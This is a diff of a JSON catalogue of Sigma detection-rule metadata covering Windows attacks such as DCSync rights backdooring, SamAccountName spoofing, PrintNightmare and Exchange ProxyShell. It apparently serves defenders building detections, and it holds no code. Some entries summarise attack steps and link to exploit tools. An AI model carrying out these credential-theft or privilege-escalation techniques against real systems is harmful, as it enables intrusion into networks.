"https://github.com/antonioCoco/JuicyPotatoNG", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "value": "Local Privilege Escalation Indicator TabTip" + }, + { + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "meta": { + "author": "NVISO", + "creation_date": "2020/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2020_1472.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", + "value": "Vulnerable Netlogon Secure Channel Connection Allowed" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_psexec.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "value": "PsExec Service Installation" + }, + { + "description": "Detects service installation with suspicious folder patterns", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder_pattern.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "value": "Service Installation with Suspicious Folder Pattern" + }, + { + "description": "Detects Remote Utilities Host service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_remote_utilities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", + "value": "Remote Utilities Host Service Install" + }, + { + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "value": "Exploit SamAccountName Spoofing with Kerberos" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_hybridconnectionmgr_svc_running.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "value": "HybridConnectionManager Service Running" + }, + { + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "value": "Unsigned Binary Loaded From Suspicious Location" + }, + { + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "value": "Microsoft Defender Blocked from Loading Unsigned DLL" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_dns_analytic_apt_gallium.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "value": "GALLIUM Artefacts - Builtin" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "value": "WMI Persistence" + }, + { + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/28", + "falsepositive": [ + "Need tuning applocker or add exceptions in SIEM" + ], + "filename": "win_applocker_file_was_not_allowed_to_run.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" + ] + }, + "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "value": "File Was Not Allowed To Run" + }, + { + "description": "Detects potential Active Directory enumeration via LDAP", "meta": { "author": "Adeem Mawani", "creation_date": "2021/06/22", @@ -14289,9 +10500,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", + "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -14302,7 +10515,31 @@ ] }, "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", - "value": "LDAP Reconnaissance / Active Directory Enumeration" + "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP" + }, + { + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "value": "Remove Exported Mailbox from Exchange Webserver" }, { "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", @@ -14328,6 +10565,54 @@ "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "value": "Possible Exploitation of Exchange RCE CVE-2021-42321" }, + { + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "meta": { + "author": "Jose Rodriguez @Cyb3rPandaH", + "creation_date": "2021/03/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/OTR_Community/status/1371053369071132675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", + "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" + }, + { + "description": "Detects a failed installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "win_exchange_transportagent_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "value": "Failed MSExchange Transport Agent Installation" + }, { "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", "meta": { @@ -14400,54 +10685,6 @@ "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", "value": "Mailbox Export to Exchange Webserver" }, - { - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/27", - "falsepositive": [ - "Unknown" - ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "value": "Remove Exported Mailbox from Exchange Webserver" - }, - { - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "meta": { - "author": "Jose Rodriguez @Cyb3rPandaH", - "creation_date": "2021/03/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/OTR_Community/status/1371053369071132675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", - "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" - }, { "description": "Detects the Installation of a Exchange Transport Agent", "meta": { @@ -14473,1832 +10710,632 @@ "value": "MSExchange Transport Agent Installation - Builtin" }, { - "description": "Detects a failed installation of a Exchange Transport Agent", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/08", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], - "filename": "win_exchange_transportagent_failed.yml", + "filename": "create_stream_hash_regedit_export_to_ads.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ] - }, - "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "value": "Failed MSExchange Transport Agent Installation" - }, - { - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/08", - "falsepositive": [ - "Legacy hosts" - ], - "filename": "win_susp_ntlm_auth.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/1004895028995477505", - "https://goo.gl/PsqrhT", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ] - }, - "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "value": "NTLM Logon" - }, - { - "description": "Detects common NTLM brute force device names", - "meta": { - "author": "Jerry Shockley '@jsh0x'", - "creation_date": "2022/02/02", - "falsepositive": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "filename": "win_susp_ntlm_brute_force.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.varonis.com/blog/investigate-ntlm-brute-force", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "value": "NTLM Brute Force" - }, - { - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "meta": { - "author": "James Pemberton", - "creation_date": "2020/05/22", - "falsepositive": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "filename": "win_susp_ntlm_rdp.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "n/a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "value": "Potential Remote Desktop Connection to Non-Domain Host" - }, - { - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "meta": { - "author": "mdecrevoisier", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate administrator activity" - ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", - "https://winaero.com/enable-openssh-server-windows-10/", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.004" - ] - }, - "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "value": "OpenSSH Server Listening On Socket" - }, - { - "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", - "meta": { - "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", - "creation_date": "2021/06/30", - "falsepositive": [ - "Problems with printer drivers" - ], - "filename": "win_exploit_cve_2021_1675_printspooler.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ] - }, - "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", - "value": "Possible CVE-2021-1675 Print Spooler Exploitation" - }, - { - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unknown" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/MalwareJake/status/1410421967463731200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ] - }, - "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "value": "CVE-2021-1675 Print Spooler Exploitation" - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ] - }, - "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", - "value": "Azure AD Health Monitoring Agent Registry Keys Access" - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ] - }, - "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "value": "Azure AD Health Service Agents Registry Keys Access" - }, - { - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "meta": { - "author": "Michaela Adams, Zach Mathis", - "creation_date": "2022/11/06", - "falsepositive": [ - "Anti-Virus" - ], - "filename": "win_security_access_token_abuse.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1134/001/", - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", - "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.t1564.004" ] }, - "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "value": "Access Token Abuse" + "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "value": "Exports Registry Key To an Alternate Data Stream" }, { - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", - "creation_date": "2019/04/03", + "author": "Florian Roth", + "creation_date": "2022/08/24", "falsepositive": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml", + "filename": "create_stream_hash_susp_domain_ext_combo.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://twitter.com/menasec1/status/1111556090137903104", - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" ], "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", - "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" + "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "value": "Suspicious File Download from File Sharing Domain" }, { - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", + "author": "Florian Roth", + "creation_date": "2022/08/24", "falsepositive": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], - "filename": "win_security_account_discovery.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", + "level": "medium", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", - "value": "AD Privileged Users or Groups Reconnaissance" + "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "value": "Unusual File Download from File Sharing Domain" }, { - "description": "Detects certificate creation with template allowing risk permission subject", - "meta": { - "author": "Orlinum , BlueDefenZer", - "creation_date": "2021/11/17", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ] - }, - "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", - "value": "ADCS Certificate Template Configuration Vulnerability" - }, - { - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "meta": { - "author": "Orlinum , BlueDefenZer", - "creation_date": "2021/11/17", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ] - }, - "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" - }, - { - "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "meta": { "author": "frack113", - "creation_date": "2022/10/14", + "creation_date": "2022/10/22", "falsepositive": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add 